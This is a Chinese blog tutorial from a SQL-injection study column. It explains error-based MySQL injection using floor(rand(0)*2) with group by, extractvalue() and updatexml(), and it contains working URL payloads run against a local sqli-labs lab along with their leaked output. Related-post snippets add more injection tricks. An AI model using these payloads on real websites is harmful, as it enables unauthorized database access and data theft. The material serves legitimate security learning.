报错注入基础

最新推荐文章于 2024-01-26 15:27:42 发布
最新推荐文章于 2024-01-26 15:27:42 发布
阅读量122 收藏
点赞数
分类专栏: SQL注入学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40939688/article/details/104927956
版权

报错注入原理

怎么利用报错注入?让错误信息可以显示数据库中的内容
接下来我们要用到
1、floor()group by对rand()函数进行操作时产生错误
2、extractvalue()
XPATH语法错误产生报错
3、updatexml()
XPATH语法错误产生报错

报错注入方法
floor()
报错需要count(*),rand()、group by、floor()。
如果单纯的select rand();出现的结果是0-1内的随机数,且每次出现的结果不同
在这里插入图片描述
当提供了一个种子参数0后,mysql> select rand(0);,结果都相同
在这里插入图片描述
floor()返回小于等于该值的最大整数,因为rand() 是返回 0 到 1 之间的随机数,那么乘 2 后自然是返回 0 到 2 之间的随机数,再配合 floor() 就可以产生确定的两个数了。也就是 0 和 1。
在这里插入图片描述
查询的时候有group by,如果使用rand()的话,该值会被计算多次

一般是一条查询执行一次rand(),那么什么时候rand()被计算多次?
group by进行分组时,floor(rand(0)*2)执行一次(查看分组是否存在),如果虚拟表中不存在该分组,那么在插入新分组的时候 floor(rand(0)*2) 就又计算了一次,插入的是新值
floor(rand(0)*2)执行出来的结果也是固定的,在这里插入图片描述

mysql> select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.5.44-0ubuntu0.14.04.11' for key 'group_key'

当和group by一起使用时,第一次计算出0,虚拟表中不存在改分组,再进行计算,计算出来的是1,将1插入新分组中,插入后再进行计算得到1,此时分组存在,count加1,再进行第四次计算,计算值为0,没有改分组,于是计算第五次,第五次计算的时候出现问题。因为第五次计算的结果为1,此时存在对应的分组,不能插入新分组,所以会报错。

所以我们可以利用这个错误,想查什么放到concat的第一个参数中就可以了,目的是让他报错,然后让两个一起通过错误信息展示出来就ok了

http://127.0.0.1/Less-1/?id=1'  and (select count(*) from information_schema.tables group by concat((select version()),' ~',floor(rand(0)*2)))%23
Duplicate entry '5.5.44-0ubuntu0.14.04.1~1' for key 'group_key'

http://127.0.0.1/Less-1/?id=1'  and (select count(*) from information_schema.tables group by concat((@@version_compile_os),' ~',floor(rand(0)*2)))%23
Duplicate entry 'debian-linux-gnu~1' for key 'group_key'

extractvalue()
XPATH语法错误产生报错
extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string);
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
  第二个参数:XPath_string (Xpath格式的字符串)
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

http://127.0.0.1/Less-1/?id=1' and (select extractvalue(null,concat('~',(select user()),'~')))%23
XPATH syntax error: '~root@localhost~'

以非法的xpath格式的字符作为开头

updatexml()
XPATH语法错误产生报错
和extractvalue相比多了一个参数

http://127.0.0.1/Less-1/?id=1' and (select updatexml(null,concat('~',(select user()),'~'),null))%23
XPATH syntax error: '~root@localhost~'

如果太长则不能全部返回,可以使用substr来截取

小冉要开心
关注
专栏目录
sql注入-报错注入
课嗨教育的专栏
04-29 800
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
报错注入
qq_39298901的博客
02-17 684
一、简介 ​ 报错注入有12种,分别是:floor报错、ExtractValue报错、UpdateXml报错、NAME_CONST报错、join报错、exp报错、GeometryCollection报错、polygon报错、multipoint报错、multlinestring报错、multpolygon报错、linestring报错。本文将探究基于floor的sql报错注入,介绍其原理及利用方法。 二、相关函数 ​ 在讲原理之前我们需要先了解一下相关sql语句以及几个sql函数的知识,然后对才能对原理理.
sql注之报错注入得用法
ikzzy的博客
12-26 239
sql注之报错注入得用法 今天我们讲一下报错注入得用法,首先我们要知道什么是报错注入: 在我们实际操作中,如果没有一个合适的数据返回点,而是仅仅带入sql数据库进行查询,则需要报错注入。 我们今天主要讲其中俩个比较常用的俩个函数,一个叫extractvalue,一个叫updatexml。这俩者得区别我们会在接下来的文章中一一展现出来。 首先我们打开salilabs第五关,我们先来测试一下, 当我们输入id=1得时候页面是you are in… 当我们输入id=2或者3得时候 还是一直显示you are i
SQL注入之报错型注入
梁顿的专栏
10-31 5011
介绍联合查询可以把我们想要的数据展示在网页上,替代网页上原有的数据内容;而今天我们要讨论的是,网页上没有展示查询结果的地方,也就是说select语句执行结果不能出现在网页上,我们需要让执行结果出现在其它地方,出现在哪呢?出现在报错语句中。 数据库返回到页面上的唯一信息就是,mysql错误。因此,我们需要以一种方式处理我们的查询,以便通过错误获取数据库信息。查询条件必须是正确的,能被后端数据库解释执
报错注入方法
u014421914的博客
01-18 194
floor() introduce: 对rand函数操作时产生错误 sql: select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)); sql execution return: brower url:
mysql报错注入利用
ATpiu的博客
04-06 329
简介 sql注入一般分类如下: - 基于时间注入 - 基于报错注入 - 基于联合查询注入 - 基于布尔注入 基于报错注入也是一种sql注入漏洞,漏洞原因是后端在处理用户输入时直接拼接进sql语句中进行执行,从而产生了正常业务之外的逻辑。其实本质上和xss这种代码注入类似,核心是没有区分开代码和用户输入的数据。 基于报错注入特点是页面会直接显示回显sql语句执行的报错信息,这样我们其实可以通过故意...
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
[ctf web]sql报错注入
qq_37301470的博客
11-12 303
报错注入 一: exp,pow溢出报错 exp(int) 返回e的x次方 exp(~(select * from (select user())a)) ~:取反运算符 将字符串处理后变为大整数,报错 exp(710):报错 exp(709):不报错 绕过if,case的过滤进行基于报错的布尔盲注。 pow(int,int) 返回x的y次方 数值过大报错 pow(1+(sql表达式),99999999999999) 若sql语句为假则不报错 为真则报错 二:XML和Xpath基础 XML:标记
ERROR 1062 (23000): Duplicate entry ‘%-root‘ for key ‘user.PRIMARY‘
喵酱
09-05 7919
ERROR 1062 (23000): Duplicate entry '%-root' for key 'user.PRIMARY'
ERROR 1062(23000):Duplicate entry %-root for key PRIMARY
EraWalker的博客
06-14 8262
ERROR 1062(23000):Duplicate entry %-root for key PRIMARY 出现这问题,虽然也可以继续运行下去,但是避免以后出现重大问题,最好还是解决一下。 该问题原因是MySQL数据库 名字为mysql数据库的user表的User字段为root的用户出现了多个,最好是把除了host为’%'或者为’localhost’的其他User字段为root的用户删除掉,然后利用命令 flush privileges; 刷新即可解决该问题 有问题可以私聊我! 会一直分享开发遇到的
mysql在更改root远程连接时候报错:Duplicate entry ‘%-root‘ for key ‘PRIMARY‘
热门推荐
张国荣家的弟弟
03-18 1万+
文章目录问题描述完整步骤 问题描述 如果执行update语句时出现ERROR 1062 (23000): Duplicate entry ‘%-root’ for key ‘PRIMARY’ 错误,说明有多个ROOT用户纪录在USER表中了. 需要select host from user where user = 'root'; 查看一下host是否已经有了%这个值,有了就可以了. 完整步骤 1.遇到这个问题的时候,使用下面两条命令: mysql>use mysql; mysql>s![在这
Mysql 报错 ERROR 1062 (23000): Duplicate entry ‘%-root‘ for key ‘PRIMARY‘
Late_whale的博客 作者:代码搬运工老李的二师兄
07-22 4713
文章目录错误详情错误原因解决方案最后 错误详情 今天在云主机上配置Hive时,设置远程连接的权限报错如下: 错误原因 之前电脑上已经有了%, 解决方案 查看一下电脑中是否已经具有% select host,user from user where user='root'; 如果已经存在则不需要在执行update user set host ='%' where user ='root';,只是还没能刷新,刷新之后就可往下走了。 最后 可以关注一下我的公众号,最近开始写公众号,我会在上面分享一些资源
ERROR 1062 (23000): Duplicate entry ‘%-root‘ for key ‘PRIMARY‘
ko_10086的博客
11-02 1181
用navicat连接数据库报错:1130-host ... is not allowed to connect to this MySql server如何处理 ​​​​​​用navicat连接数据库报错:1130-host ... is not allowed to connect to this MySql server如何处理_dabao87的博客-CSDN博客 ERROR 1062 (23000): Duplicate entry '%-root' for key 'PRIMARY'
mysql不允许远程用户访问主机服务器 1130
像阳光一样
07-12 228
安装完之后成 使用 mysql admin连接报错 ERROR 1130: Host ***.***.***.*** is not allowed to connect to this MySQL server 以下百度查到的,试过可以 说明所连接的用户帐号没有远程连接的权限,只能在本机(localhost)登录。 需更改 mysql 数据库里的 user表里的 host项 ...
开启mysql远程服务时 遇到 MySQL ERROR 1062 (23000): Duplicate entry '%-root' for key 'PRIMARY' 的错误
pc_wang 随风飘荡
07-17 3450
如何开启mysql 远程操作?已经开启过程可能会报一条错误,把这个记录下来,mysql给我的印象太TM深刻了。。。 #/usr/local/mysql/bin/mysql -u root 会提示输入密码,输入密码之后会展示下面的界面 左边显示mysql,代表进入mysql 了 //切换到mysql 数据库 mysql> use mysql; mysql> select Host,Us...
记录mysql执行UPDATE user SET host = ‘%‘ WHERE user = ‘root‘报错的问题
最新发布
weixin_37985149的博客
01-26 1818
原因是yum源开启了GPG校验,开启校验后需要在/etc/pki/rpm-gpg 目录下有对应的安装文件公钥文件,才能完成校验。参考docker安装mysql 8.0 链接:https://blog.csdn.net/a1150499208/article/details/131437199。执行yum --enablerepo=mysql80-community install mysql-community-server时报错。我查询了user表想看看用户信息,发现用两个root用户。
Web攻防训练营:GET报错注入详解
报错注入基础是利用嵌套查询结构,其中内部查询(子查询)的结果影响外部查询的执行。当内部查询导致错误时,数据库会返回一个包含敏感信息的错误消息,攻击者可以利用这些错误消息来揭示数据库结构、表名、列名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值